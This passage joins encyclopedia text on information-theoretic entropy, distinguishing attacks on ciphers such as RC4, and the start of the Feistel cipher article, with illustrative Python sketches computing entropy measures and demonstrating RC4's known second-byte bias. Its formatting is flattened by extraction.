_{b_{i}}\left({\frac {1}{b_{i}}},\ldots ,{\frac {1}{b_{i}}}\right).} Choosingk=n,b1= ... =bn= 1this implies that the entropy of a certain outcome is zero:Η1(1) = 0. This implies that the efficiency of a source set withnsymbols can be defined simply as being equal to itsn-ary entropy. See alsoRedundancy (information theory). The characterization here imposes an additive property with respect to apartition of a set. Meanwhile, theconditional probabilityis defined in terms of a multiplicative property,P(A∣B)⋅P(B)=P(A∩B){\displaystyle P(A\mid B)\cdot P(B)=P(A\cap B)}. Observe that a logarithm mediates between these two operations. Theconditional entropyand related quantities inherit simple relation, in turn. The measure theoretic definition in the previous section defined the entropy as a sum over expected surprisalsμ(A)⋅ln⁡μ(A){\displaystyle \mu (A)\cdot \ln \mu (A)}for an extremal partition. Here the logarithm is ad hoc and the entropy is not a measure in itself. 
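The additivity consequence stated above, H_n(1/n, …, 1/n) = H_k(b_1/n, …, b_k/n) + Σ_i (b_i/n) H_{b_i}(1/b_i, …, 1/b_i), can be checked numerically; below is a small Python sketch with an assumed split of n = 6 equiprobable outcomes into blocks of sizes 1, 2 and 3.

```python
import math

def entropy(probs):
    return -sum(p * math.log2(p) for p in probs if p > 0)

# Grouping property: the entropy of 6 equiprobable outcomes equals the entropy
# of choosing a block plus the probability-weighted entropy within the blocks.
n, blocks = 6, [1, 2, 3]
lhs = entropy([1 / n] * n)
rhs = entropy([b / n for b in blocks]) + sum(
    (b / n) * entropy([1 / b] * b) for b in blocks
)
print(lhs, rhs)   # both ~2.585 bits
```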
At least in the information theory of a binary string,log2{\displaystyle \log _{2}}lends itself to practical interpretations. Motivated by such relations, a plethora of related and competing quantities have been defined. For example,David Ellerman's analysis of a "logic of partitions" defines a competing measure in structuresdualto that of subsets of a universal set.[16]Information is quantified as "dits" (distinctions), a measure on partitions. "Dits" can be converted intoShannon's bits, to get the formulas for conditional entropy, and so on. Another succinct axiomatic characterization of Shannon entropy was given byAczél, Forte and Ng,[17]via the following properties: It was shown that any functionH{\displaystyle \mathrm {H} }satisfying the above properties must be a constant multiple of Shannon entropy, with a non-negative constant.[17]Compared to the previously mentioned characterizations of entropy, this characterization focuses on the properties of entropy as a function of random variables (subadditivity and additivity), rather than the properties of entropy as a function of the probability vectorp1,…,pn{\displaystyle p_{1},\ldots ,p_{n}}. It is worth noting that if we drop the "small for small probabilities" property, thenH{\displaystyle \mathrm {H} }must be a non-negative linear combination of the Shannon entropy and theHartley entropy.[17] The Shannon entropy satisfies the following properties, for some of which it is useful to interpret entropy as the expected amount of information learned (or uncertainty eliminated) by revealing the value of a random variableX: The inspiration for adopting the wordentropyin information theory came from the close resemblance between Shannon's formula and very similar known formulae fromstatistical mechanics. Instatistical thermodynamicsthe most general formula for the thermodynamicentropySof athermodynamic systemis theGibbs entropyS=−kB∑ipiln⁡pi,{\displaystyle S=-k_{\text{B}}\sum _{i}p_{i}\ln p_{i}\,,}wherekBis theBoltzmann constant, andpiis the probability of amicrostate. TheGibbs entropywas defined byJ. Willard Gibbsin 1878 after earlier work byLudwig Boltzmann(1872).[18] The Gibbs entropy translates over almost unchanged into the world ofquantum physicsto give thevon Neumann entropyintroduced byJohn von Neumannin 1927:S=−kBTr(ρln⁡ρ),{\displaystyle S=-k_{\text{B}}\,{\rm {Tr}}(\rho \ln \rho )\,,}where ρ is thedensity matrixof the quantum mechanical system and Tr is thetrace.[19] At an everyday practical level, the links between information entropy and thermodynamic entropy are not evident. Physicists and chemists are apt to be more interested inchangesin entropy as a system spontaneously evolves away from its initial conditions, in accordance with thesecond law of thermodynamics, rather than an unchanging probability distribution. As the minuteness of the Boltzmann constantkBindicates, the changes inS/kBfor even tiny amounts of substances in chemical and physical processes represent amounts of entropy that are extremely large compared to anything indata compressionorsignal processing. In classical thermodynamics, entropy is defined in terms of macroscopic measurements and makes no reference to any probability distribution, which is central to the definition of information entropy. 
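For the quantum-mechanical analogue above, the von Neumann entropy can be computed from the eigenvalues of the density matrix. The sketch below (assuming NumPy, and reporting S/k_B in bits rather than the physical entropy in J/K) contrasts a pure state with the maximally mixed qubit.

```python
import numpy as np

def von_neumann_entropy(rho, base=2):
    """-Tr(rho log rho), computed from the eigenvalues of the density matrix rho."""
    evals = np.linalg.eigvalsh(rho)
    evals = evals[evals > 1e-12]          # treat 0 log 0 as 0
    return float(-np.sum(evals * np.log(evals)) / np.log(base))

pure = np.array([[1.0, 0.0],              # a pure state: zero entropy
                 [0.0, 0.0]])
mixed = np.eye(2) / 2                     # maximally mixed qubit: one bit
print(von_neumann_entropy(pure))          # 0.0
print(von_neumann_entropy(mixed))         # 1.0
```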
The connection between thermodynamics and what is now known as information theory was first made by Boltzmann and expressed by hisequation: S=kBln⁡W,{\displaystyle S=k_{\text{B}}\ln W,} whereS{\displaystyle S}is the thermodynamic entropy of a particular macrostate (defined by thermodynamic parameters such as temperature, volume, energy, etc.),Wis the number of microstates (various combinations of particles in various energy states) that can yield the given macrostate, andkBis the Boltzmann constant.[20]It is assumed that each microstate is equally likely, so that the probability of a given microstate ispi= 1/W. When these probabilities are substituted into the above expression for the Gibbs entropy (or equivalentlykBtimes the Shannon entropy), Boltzmann's equation results. In information theoretic terms, the information entropy of a system is the amount of "missing" information needed to determine a microstate, given the macrostate. In the view ofJaynes(1957),[21]thermodynamic entropy, as explained bystatistical mechanics, should be seen as anapplicationof Shannon's information theory: the thermodynamic entropy is interpreted as being proportional to the amount of further Shannon information needed to define the detailed microscopic state of the system, that remains uncommunicated by a description solely in terms of the macroscopic variables of classical thermodynamics, with the constant of proportionality being just the Boltzmann constant. Adding heat to a system increases its thermodynamic entropy because it increases the number of possible microscopic states of the system that are consistent with the measurable values of its macroscopic variables, making any complete state description longer. (See article:maximum entropy thermodynamics).Maxwell's demoncan (hypothetically) reduce the thermodynamic entropy of a system by using information about the states of individual molecules; but, asLandauer(from 1961) and co-workers[22]have shown, to function the demon himself must increase thermodynamic entropy in the process, by at least the amount of Shannon information he proposes to first acquire and store; and so the total thermodynamic entropy does not decrease (which resolves the paradox).Landauer's principleimposes a lower bound on the amount of heat a computer must generate to process a given amount of information, though modern computers are far less efficient. Shannon's definition of entropy, when applied to an information source, can determine the minimum channel capacity required to reliably transmit the source as encoded binary digits. Shannon's entropy measures the information contained in a message as opposed to the portion of the message that is determined (or predictable). Examples of the latter include redundancy in language structure or statistical properties relating to the occurrence frequencies of letter or word pairs, triplets etc. The minimum channel capacity can be realized in theory by using thetypical setor in practice usingHuffman,Lempel–Zivorarithmetic coding. (See alsoKolmogorov complexity.) In practice, compression algorithms deliberately include some judicious redundancy in the form ofchecksumsto protect against errors. Theentropy rateof a data source is the average number of bits per symbol needed to encode it. Shannon's experiments with human predictors show an information rate between 0.6 and 1.3 bits per character in English;[23]thePPM compression algorithmcan achieve a compression ratio of 1.5 bits per character in English text. 
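A crude way to see why such entropy-rate figures are only estimates is to compute an order-0 estimate, based on single-character frequencies alone, for a sample string; a minimal Python sketch (the sample text is arbitrary):

```python
import math
from collections import Counter

def order0_entropy(text):
    """Per-character entropy estimate from single-character frequencies."""
    counts = Counter(text)
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

sample = ("the quick brown fox jumps over the lazy dog and then "
          "the quick brown fox does it again and again")
print(order0_entropy(sample))   # roughly 4 bits per character for this sample
```

An order-0 model ignores inter-character structure entirely, which is why it lands around 4 bits per character, whereas Shannon's figure of 0.6 to 1.3 bits per character reflects the much stronger predictability available from longer contexts.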
If acompressionscheme is lossless – one in which you can always recover the entire original message by decompression – then a compressed message has the same quantity of information as the original but is communicated in fewer characters. It has more information (higher entropy) per character. A compressed message has lessredundancy.Shannon's source coding theoremstates a lossless compression scheme cannot compress messages, on average, to havemorethan one bit of information per bit of message, but that any valuelessthan one bit of information per bit of message can be attained by employing a suitable coding scheme. The entropy of a message per bit multiplied by the length of that message is a measure of how much total information the message contains. Shannon's theorem also implies that no lossless compression scheme can shortenallmessages. If some messages come out shorter, at least one must come out longer due to thepigeonhole principle. In practical use, this is generally not a problem, because one is usually only interested in compressing certain types of messages, such as a document in English, as opposed to gibberish text, or digital photographs rather than noise, and it is unimportant if a compression algorithm makes some unlikely or uninteresting sequences larger. A 2011 study inScienceestimates the world's technological capacity to store and communicate optimally compressed information normalized on the most effective compression algorithms available in the year 2007, therefore estimating the entropy of the technologically available sources.[24]: 60–65 The authors estimate humankind technological capacity to store information (fully entropically compressed) in 1986 and again in 2007. They break the information into three categories—to store information on a medium, to receive information through one-waybroadcastnetworks, or to exchange information through two-waytelecommunications networks.[24] Entropy is one of several ways to measure biodiversity and is applied in the form of theShannon index.[25]A diversity index is a quantitative statistical measure of how many different types exist in a dataset, such as species in a community, accounting for ecologicalrichness,evenness, anddominance. Specifically, Shannon entropy is the logarithm of1D, thetrue diversityindex with parameter equal to 1. The Shannon index is related to the proportional abundances of types. There are a number of entropy-related concepts that mathematically quantify information content of a sequence or message: (The "rate of self-information" can also be defined for a particular sequence of messages or symbols generated by a given stochastic process: this will always be equal to the entropy rate in the case of astationary process.) Otherquantities of informationare also used to compare or relate different sources of information. It is important not to confuse the above concepts. Often it is only clear from context which one is meant. For example, when someone says that the "entropy" of the English language is about 1 bit per character, they are actually modeling the English language as a stochastic process and talking about its entropyrate. Shannon himself used the term in this way. If very large blocks are used, the estimate of per-character entropy rate may become artificially low because the probability distribution of the sequence is not known exactly; it is only an estimate. 
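As a small illustration of the Shannon index described above, the sketch below (with made-up abundance counts) computes the index in nats and exponentiates it to obtain the true diversity of order 1.

```python
import math

def shannon_index(counts):
    """Shannon entropy (in nats) of the proportional abundances."""
    total = sum(counts)
    props = [c / total for c in counts if c > 0]
    return -sum(p * math.log(p) for p in props)

# Hypothetical community: four species with these abundances.
counts = [50, 30, 15, 5]
H = shannon_index(counts)
print(H)             # ~1.14 nats
print(math.exp(H))   # true diversity of order 1: ~3.1 "effective species"
```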
If one considers the text of every book ever published as a sequence, with each symbol being the text of a complete book, and if there areNpublished books, and each book is only published once, the estimate of the probability of each book is1/N, and the entropy (in bits) is−log2(1/N) = log2(N). As a practical code, this corresponds to assigning each book aunique identifierand using it in place of the text of the book whenever one wants to refer to the book. This is enormously useful for talking about books, but it is not so useful for characterizing the information content of an individual book, or of language in general: it is not possible to reconstruct the book from its identifier without knowing the probability distribution, that is, the complete text of all the books. The key idea is that the complexity of the probabilistic model must be considered.Kolmogorov complexityis a theoretical generalization of this idea that allows the consideration of the information content of a sequence independent of any particular probability model; it considers the shortestprogramfor auniversal computerthat outputs the sequence. A code that achieves the entropy rate of a sequence for a given model, plus the codebook (i.e. the probabilistic model), is one such program, but it may not be the shortest. The Fibonacci sequence is 1, 1, 2, 3, 5, 8, 13, .... treating the sequence as a message and each number as a symbol, there are almost as many symbols as there are characters in the message, giving an entropy of approximatelylog2(n). The first 128 symbols of the Fibonacci sequence has an entropy of approximately 7 bits/symbol, but the sequence can be expressed using a formula [F(n) = F(n−1) + F(n−2)forn= 3, 4, 5, ...,F(1) =1,F(2) = 1] and this formula has a much lower entropy and applies to any length of the Fibonacci sequence. Incryptanalysis, entropy is often roughly used as a measure of the unpredictability of a cryptographic key, though its realuncertaintyis unmeasurable. For example, a 128-bit key that is uniformly and randomly generated has 128 bits of entropy. It also takes (on average)2127{\displaystyle 2^{127}}guesses to break by brute force. Entropy fails to capture the number of guesses required if the possible keys are not chosen uniformly.[26][27]Instead, a measure calledguessworkcan be used to measure the effort required for a brute force attack.[28] Other problems may arise from non-uniform distributions used in cryptography. For example, a 1,000,000-digit binaryone-time padusing exclusive or. If the pad has 1,000,000 bits of entropy, it is perfect. If the pad has 999,999 bits of entropy, evenly distributed (each individual bit of the pad having 0.999999 bits of entropy) it may provide good security. But if the pad has 999,999 bits of entropy, where the first bit is fixed and the remaining 999,999 bits are perfectly random, the first bit of the ciphertext will not be encrypted at all. A common way to define entropy for text is based on theMarkov modelof text. For an order-0 source (each character is selected independent of the last characters), the binary entropy is: H(S)=−∑ipilog⁡pi,{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\log p_{i},} wherepiis the probability ofi. 
For a first-orderMarkov source(one in which the probability of selecting a character is dependent only on the immediately preceding character), theentropy rateis:[citation needed] H(S)=−∑ipi∑jpi(j)log⁡pi(j),{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\sum _{j}\ p_{i}(j)\log p_{i}(j),} whereiis astate(certain preceding characters) andpi(j){\displaystyle p_{i}(j)}is the probability ofjgivenias the previous character. For a second order Markov source, the entropy rate is H(S)=−∑ipi∑jpi(j)∑kpi,j(k)log⁡pi,j(k).{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\sum _{j}p_{i}(j)\sum _{k}p_{i,j}(k)\ \log p_{i,j}(k).} A source setX{\displaystyle {\mathcal {X}}}with a non-uniform distribution will have less entropy than the same set with a uniform distribution (i.e. the "optimized alphabet"). This deficiency in entropy can be expressed as a ratio called efficiency:[29] η(X)=HHmax=−∑i=1np(xi)logb⁡(p(xi))logb⁡(n).{\displaystyle \eta (X)={\frac {H}{H_{\text{max}}}}=-\sum _{i=1}^{n}{\frac {p(x_{i})\log _{b}(p(x_{i}))}{\log _{b}(n)}}.}Applying the basic properties of the logarithm, this quantity can also be expressed as:η(X)=−∑i=1np(xi)logb⁡(p(xi))logb⁡(n)=∑i=1nlogb⁡(p(xi)−p(xi))logb⁡(n)=∑i=1nlogn⁡(p(xi)−p(xi))=logn⁡(∏i=1np(xi)−p(xi)).{\displaystyle {\begin{aligned}\eta (X)&=-\sum _{i=1}^{n}{\frac {p(x_{i})\log _{b}(p(x_{i}))}{\log _{b}(n)}}=\sum _{i=1}^{n}{\frac {\log _{b}\left(p(x_{i})^{-p(x_{i})}\right)}{\log _{b}(n)}}\\[1ex]&=\sum _{i=1}^{n}\log _{n}\left(p(x_{i})^{-p(x_{i})}\right)=\log _{n}\left(\prod _{i=1}^{n}p(x_{i})^{-p(x_{i})}\right).\end{aligned}}} Efficiency has utility in quantifying the effective use of acommunication channel. This formulation is also referred to as the normalized entropy, as the entropy is divided by the maximum entropylogb⁡(n){\displaystyle {\log _{b}(n)}}. Furthermore, the efficiency is indifferent to the choice of (positive) baseb, as indicated by the insensitivity within the final logarithm above thereto. The Shannon entropy is restricted to random variables taking discrete values. The corresponding formula for a continuous random variable withprobability density functionf(x)with finite or infinite supportX{\displaystyle \mathbb {X} }on the real line is defined by analogy, using the above form of the entropy as an expectation:[11]: 224 H(X)=E[−log⁡f(X)]=−∫Xf(x)log⁡f(x)dx.{\displaystyle \mathrm {H} (X)=\mathbb {E} [-\log f(X)]=-\int _{\mathbb {X} }f(x)\log f(x)\,\mathrm {d} x.} This is the differential entropy (or continuous entropy). A precursor of the continuous entropyh[f]is the expression for the functionalΗin theH-theoremof Boltzmann. Although the analogy between both functions is suggestive, the following question must be set: is the differential entropy a valid extension of the Shannon discrete entropy? Differential entropy lacks a number of properties that the Shannon discrete entropy has – it can even be negative – and corrections have been suggested, notablylimiting density of discrete points. To answer this question, a connection must be established between the two functions: In order to obtain a generally finite measure as thebin sizegoes to zero. In the discrete case, the bin size is the (implicit) width of each of then(finite or infinite) bins whose probabilities are denoted bypn. As the continuous domain is generalized, the width must be made explicit. To do this, start with a continuous functionfdiscretized into bins of sizeΔ{\displaystyle \Delta }. 
By the mean-value theorem there exists a valuexiin each bin such thatf(xi)Δ=∫iΔ(i+1)Δf(x)dx{\displaystyle f(x_{i})\Delta =\int _{i\Delta }^{(i+1)\Delta }f(x)\,dx}the integral of the functionfcan be approximated (in the Riemannian sense) by∫−∞∞f(x)dx=limΔ→0∑i=−∞∞f(xi)Δ,{\displaystyle \int _{-\infty }^{\infty }f(x)\,dx=\lim _{\Delta \to 0}\sum _{i=-\infty }^{\infty }f(x_{i})\Delta ,}where this limit and "bin size goes to zero" are equivalent. We will denoteHΔ:=−∑i=−∞∞f(xi)Δlog⁡(f(xi)Δ){\displaystyle \mathrm {H} ^{\Delta }:=-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log \left(f(x_{i})\Delta \right)}and expanding the logarithm, we haveHΔ=−∑i=−∞∞f(xi)Δlog⁡(f(xi))−∑i=−∞∞f(xi)Δlog⁡(Δ).{\displaystyle \mathrm {H} ^{\Delta }=-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(f(x_{i}))-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(\Delta ).} AsΔ → 0, we have ∑i=−∞∞f(xi)Δ→∫−∞∞f(x)dx=1∑i=−∞∞f(xi)Δlog⁡(f(xi))→∫−∞∞f(x)log⁡f(x)dx.{\displaystyle {\begin{aligned}\sum _{i=-\infty }^{\infty }f(x_{i})\Delta &\to \int _{-\infty }^{\infty }f(x)\,dx=1\\\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(f(x_{i}))&\to \int _{-\infty }^{\infty }f(x)\log f(x)\,dx.\end{aligned}}} Note;log(Δ) → −∞asΔ → 0, requires a special definition of the differential or continuous entropy: h[f]=limΔ→0(HΔ+log⁡Δ)=−∫−∞∞f(x)log⁡f(x)dx,{\displaystyle h[f]=\lim _{\Delta \to 0}\left(\mathrm {H} ^{\Delta }+\log \Delta \right)=-\int _{-\infty }^{\infty }f(x)\log f(x)\,dx,} which is, as said before, referred to as the differential entropy. This means that the differential entropyis nota limit of the Shannon entropy forn→ ∞. Rather, it differs from the limit of the Shannon entropy by an infinite offset (see also the article oninformation dimension). It turns out as a result that, unlike the Shannon entropy, the differential entropy isnotin general a good measure of uncertainty or information. For example, the differential entropy can be negative; also it is not invariant under continuous co-ordinate transformations. This problem may be illustrated by a change of units whenxis a dimensioned variable.f(x)will then have the units of1/x. The argument of the logarithm must be dimensionless, otherwise it is improper, so that the differential entropy as given above will be improper. IfΔis some "standard" value ofx(i.e. "bin size") and therefore has the same units, then a modified differential entropy may be written in proper form as:H=∫−∞∞f(x)log⁡(f(x)Δ)dx,{\displaystyle \mathrm {H} =\int _{-\infty }^{\infty }f(x)\log(f(x)\,\Delta )\,dx,}and the result will be the same for any choice of units forx. In fact, the limit of discrete entropy asN→∞{\displaystyle N\rightarrow \infty }would also include a term oflog⁡(N){\displaystyle \log(N)}, which would in general be infinite. This is expected: continuous variables would typically have infinite entropy when discretized. Thelimiting density of discrete pointsis really a measure of how much easier a distribution is to describe than a distribution that is uniform over its quantization scheme. Another useful measure of entropy that works equally well in the discrete and the continuous case is therelative entropyof a distribution. It is defined as theKullback–Leibler divergencefrom the distribution to a reference measuremas follows. Assume that a probability distributionpisabsolutely continuouswith respect to a measurem, i.e. 
is of the formp(dx) =f(x)m(dx)for some non-negativem-integrable functionfwithm-integral 1, then the relative entropy can be defined asDKL(p‖m)=∫log⁡(f(x))p(dx)=∫f(x)log⁡(f(x))m(dx).{\displaystyle D_{\mathrm {KL} }(p\|m)=\int \log(f(x))p(dx)=\int f(x)\log(f(x))m(dx).} In this form the relative entropy generalizes (up to change in sign) both the discrete entropy, where the measuremis thecounting measure, and the differential entropy, where the measuremis theLebesgue measure. If the measuremis itself a probability distribution, the relative entropy is non-negative, and zero ifp=mas measures. It is defined for any measure space, hence coordinate independent and invariant under co-ordinate reparameterizations if one properly takes into account the transformation of the measurem. The relative entropy, and (implicitly) entropy and differential entropy, do depend on the "reference" measurem. Terence Taoused entropy to make a useful connection trying to solve theErdős discrepancy problem.[30][31] Intuitively the idea behind the proof was if there is low information in terms of the Shannon entropy between consecutive random variables (here the random variable is defined using theLiouville function(which is a useful mathematical function for studying distribution of primes)XH=λ(n+H){\displaystyle \lambda (n+H)}. And in an interval [n, n+H] the sum over that interval could become arbitrary large. For example, a sequence of +1's (which are values ofXHcould take) have trivially low entropy and their sum would become big. But the key insight was showing a reduction in entropy by non negligible amounts as one expands H leading inturn to unbounded growth of a mathematical object over this random variable is equivalent to showing the unbounded growth per theErdős discrepancy problem. The proof is quite involved and it brought together breakthroughs not just in novel use of Shannon entropy, but also it used theLiouville functionalong with averages of modulated multiplicative functions[32]in short intervals. Proving it also broke the "parity barrier"[33]for this specific problem. While the use of Shannon entropy in the proof is novel it is likely to open new research in this direction. Entropy has become a useful quantity incombinatorics. A simple example of this is an alternative proof of theLoomis–Whitney inequality: for every subsetA⊆Zd, we have|A|d−1≤∏i=1d|Pi(A)|{\displaystyle |A|^{d-1}\leq \prod _{i=1}^{d}|P_{i}(A)|}wherePiis theorthogonal projectionin theith coordinate:Pi(A)={(x1,…,xi−1,xi+1,…,xd):(x1,…,xd)∈A}.{\displaystyle P_{i}(A)=\{(x_{1},\ldots ,x_{i-1},x_{i+1},\ldots ,x_{d}):(x_{1},\ldots ,x_{d})\in A\}.} The proof follows as a simple corollary ofShearer's inequality: ifX1, ...,Xdare random variables andS1, ...,Snare subsets of{1, ...,d} such that every integer between 1 anddlies in exactlyrof these subsets, thenH[(X1,…,Xd)]≤1r∑i=1nH[(Xj)j∈Si]{\displaystyle \mathrm {H} [(X_{1},\ldots ,X_{d})]\leq {\frac {1}{r}}\sum _{i=1}^{n}\mathrm {H} [(X_{j})_{j\in S_{i}}]}where(Xj)j∈Si{\displaystyle (X_{j})_{j\in S_{i}}}is the Cartesian product of random variablesXjwith indexesjinSi(so the dimension of this vector is equal to the size ofSi). We sketch how Loomis–Whitney follows from this: Indeed, letXbe a uniformly distributed random variable with values inAand so that each point inAoccurs with equal probability. Then (by the further properties of entropy mentioned above)Η(X) = log|A|, where|A|denotes the cardinality ofA. LetSi= {1, 2, ...,i−1,i+1, ...,d}. 
The range of(Xj)j∈Si{\displaystyle (X_{j})_{j\in S_{i}}}is contained inPi(A)and henceH[(Xj)j∈Si]≤log⁡|Pi(A)|{\displaystyle \mathrm {H} [(X_{j})_{j\in S_{i}}]\leq \log |P_{i}(A)|}. Now use this to bound the right side of Shearer's inequality and exponentiate the opposite sides of the resulting inequality you obtain. For integers0 <k<nletq=k/n. Then2nH(q)n+1≤(nk)≤2nH(q),{\displaystyle {\frac {2^{n\mathrm {H} (q)}}{n+1}}\leq {\tbinom {n}{k}}\leq 2^{n\mathrm {H} (q)},}where[34]: 43H(q)=−qlog2⁡(q)−(1−q)log2⁡(1−q).{\displaystyle \mathrm {H} (q)=-q\log _{2}(q)-(1-q)\log _{2}(1-q).} ∑i=0n(ni)qi(1−q)n−i=(q+(1−q))n=1.{\displaystyle \sum _{i=0}^{n}{\tbinom {n}{i}}q^{i}(1-q)^{n-i}=(q+(1-q))^{n}=1.}Rearranging gives the upper bound. For the lower bound one first shows, using some algebra, that it is the largest term in the summation. But then,(nk)qqn(1−q)n−nq≥1n+1{\displaystyle {\binom {n}{k}}q^{qn}(1-q)^{n-nq}\geq {\frac {1}{n+1}}}since there aren+ 1terms in the summation. Rearranging gives the lower bound. A nice interpretation of this is that the number of binary strings of lengthnwith exactlykmany 1's is approximately2nH(k/n){\displaystyle 2^{n\mathrm {H} (k/n)}}.[35] Machine learningtechniques arise largely from statistics and also information theory. In general, entropy is a measure of uncertainty and the objective of machine learning is to minimize uncertainty. Decision tree learningalgorithms use relative entropy to determine the decision rules that govern the data at each node.[36]Theinformation gain in decision treesIG(Y,X){\displaystyle IG(Y,X)}, which is equal to the difference between the entropy ofY{\displaystyle Y}and the conditional entropy ofY{\displaystyle Y}givenX{\displaystyle X}, quantifies the expected information, or the reduction in entropy, from additionally knowing the value of an attributeX{\displaystyle X}. The information gain is used to identify which attributes of the dataset provide the most information and should be used to split the nodes of the tree optimally. Bayesian inferencemodels often apply theprinciple of maximum entropyto obtainprior probabilitydistributions.[37]The idea is that the distribution that best represents the current state of knowledge of a system is the one with the largest entropy, and is therefore suitable to be the prior. Classification in machine learningperformed bylogistic regressionorartificial neural networksoften employs a standard loss function, calledcross-entropyloss, that minimizes the average cross entropy between ground truth and predicted distributions.[38]In general, cross entropy is a measure of the differences between two datasets similar to the KL divergence (also known as relative entropy). This article incorporates material from Shannon's entropy onPlanetMath, which is licensed under theCreative Commons Attribution/Share-Alike License.
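To make the decision-tree use of entropy concrete, here is a minimal, self-contained Python sketch of information gain IG(Y, X) = H(Y) − H(Y|X) on a made-up toy dataset; the attribute and label names are illustrative, not from the source.

```python
import math
from collections import Counter

def entropy(labels):
    n = len(labels)
    return -sum((c / n) * math.log2(c / n) for c in Counter(labels).values())

def information_gain(attribute, labels):
    """IG(Y, X) = H(Y) - H(Y | X) for a categorical attribute X."""
    n = len(labels)
    h_y_given_x = 0.0
    for value in set(attribute):
        subset = [y for x, y in zip(attribute, labels) if x == value]
        h_y_given_x += (len(subset) / n) * entropy(subset)
    return entropy(labels) - h_y_given_x

# Tiny toy dataset: 'outlook' predicts the label far better than 'windy' does.
outlook = ['sun', 'sun', 'rain', 'rain', 'rain', 'sun']
windy   = ['yes', 'no',  'yes',  'no',   'no',  'yes']
play    = ['no',  'no',  'yes',  'yes',  'yes', 'no']

print(information_gain(outlook, play))  # 1.0   -- splits the labels perfectly
print(information_gain(windy, play))    # ~0.08 -- tells us very little
```

A decision-tree learner would therefore split on 'outlook' first, since that attribute removes the most uncertainty about the label.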
https://en.wikipedia.org/wiki/Entropy_(information_theory)
In cryptography, a distinguishing attack is any form of cryptanalysis on data encrypted by a cipher that allows an attacker to distinguish the encrypted data from random data.[1] Modern symmetric-key ciphers are specifically designed to be immune to such an attack.[2] In other words, modern encryption schemes are pseudorandom permutations and are designed to have ciphertext indistinguishability. If an algorithm is found that can distinguish the output from random faster than a brute force search, then that is considered a break of the cipher. A similar concept is the known-key distinguishing attack, whereby an attacker knows the key and can find a structural property in the cipher, where the transformation from plaintext to ciphertext is not random.[3]

To prove that a cryptographic function is safe, it is often compared to a random oracle. If a function were a random oracle, then an attacker is not able to predict any of the output of the function. If a function is distinguishable from a random oracle, it has non-random properties. That is, there exists a relation between different outputs, or between input and output, which can be used by an attacker, for example, to find (a part of) the input.

Example: Let T be a sequence of random bits, generated by a random oracle, and S be a sequence generated by a pseudo-random bit generator. Two parties use one encryption system to encrypt a message M of length n as the bitwise XOR of M and the next n bits of T or S respectively. The output of the encryption using T is truly random. Now, if the sequence S cannot be distinguished from T, the output of the encryption with S will appear random as well. If the sequence S is distinguishable, then the encryption of M with S may reveal information about M.

Two systems S and T are said to be indistinguishable if there exists no algorithm D, connected to either S or T, able to decide whether it is connected to S or T. A distinguishing attack is given by such an algorithm D. It is broadly an attack in which the attacker is given a black box containing either an instance of the system under attack with an unknown key, or a random object in the domain that the system aims to emulate; if the algorithm is able to tell whether the system or the random object is in the black box, one has an attack. For example, a distinguishing attack on a stream cipher such as RC4 might be one that determines whether a given stream of bytes is random or generated by RC4 with an unknown key.

A classic example of a distinguishing attack on a popular stream cipher was given by Itsik Mantin and Adi Shamir, who showed that the 2nd output byte of RC4 was heavily biased toward zero.[4] In another example, Souradyuti Paul and Bart Preneel of COSIC have shown that the XOR value of the 1st and 2nd outputs of RC4 is also non-uniform. Significantly, both of the above theoretical biases can be demonstrated through computer simulation.[5]
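The Mantin–Shamir bias mentioned above is easy to observe empirically. The sketch below implements textbook RC4 (key scheduling plus two steps of output generation) and tallies how often the second output byte is zero over many random 16-byte keys; for a truly random stream the frequency would be about 1/256, whereas RC4 shows roughly 2/256. The key length and sample count are arbitrary illustrative choices.

```python
import os
from collections import Counter

def rc4_second_byte(key):
    """Return the second output byte of RC4 for the given key."""
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA), run for two output bytes
    i = j = out = 0
    for _ in range(2):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out = S[(S[i] + S[j]) % 256]
    return out

trials = 50_000
counts = Counter(rc4_second_byte(os.urandom(16)) for _ in range(trials))
print(counts[0] / trials)   # ~2/256 (about 0.0078)
print(1 / 256)              # 0.0039, what a random stream would give
```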
https://en.wikipedia.org/wiki/Distinguishing_attack
Incryptography, aFeistel cipher(also known asLuby–Rackoff block cipher) is asymmetric structureused in the construction ofblock ciphers, named after theGerman-bornphysicistand cryptographerHorst Feistel, who did pioneering research while working forIBM; it is also commonly known as aFeistel network. A large number ofblock ciphersuse the scheme, including the USData Encryption Standard, the Soviet/RussianGOSTand the more recentBlowfishandTwofishciphers. In a Feistel cipher, encryption and decryption are very similar operations, and both consist of iteratively running a function called a "round function" a fixed number of times. Many modern symmetric block ciphers are based on Feistel networks. Feistel networks were first seen commercially in IBM'sLucifercipher, designed byHorst FeistelandDon Coppersmithin 1973. Feistel networks gained respectability when the U.S. Federal Government adopted theDES(a cipher based on Lucifer, with changes made by theNSA) in 1976. Like other components of the DES, the iterative nature of the Feistel construction makes implementing the cryptosystem in hardware easier (particularly on the hardware available at the time of DES's design). A Feistel network uses around function, a function which takes two inputs – a data block and a subkey – and returns one output of the same size as the data block.[1]In each round, the round function is run on half of the data to be encrypted, and its output is XORed with the other half of the data. This is repeated a fixed number of times, and the final output is the encrypted data. An important advantage of Feistel networks compared to other cipher designs such assubstitution–permutation networksis that the entire operation is guaranteed to be invertible (that is, encrypted data can be decrypted), even if the round function is not itself invertible. The round function can be made arbitrarily complicated, since it does not need to be designed to be invertible.[2]: 465[3]: 347Furthermore, theencryptionanddecryptionoperations are very similar, even identical in some cases, requiring only a reversal of thekey schedule. Therefore, the size of the code or circuitry required to implement such a cipher is nearly halved. Unlike substitution-permutation networks, Feistel networks also do not depend on a substitution box that could cause timing side-channels in software implementations. The structure and properties of Feistel ciphers have been extensively analyzed bycryptographers. Michael LubyandCharles Rackoffanalyzed the Feistel cipher construction and proved that if the round function is a cryptographically securepseudorandom function, withKiused as the seed, then 3 rounds are sufficient to make the block cipher apseudorandom permutation, while 4 rounds are sufficient to make it a "strong" 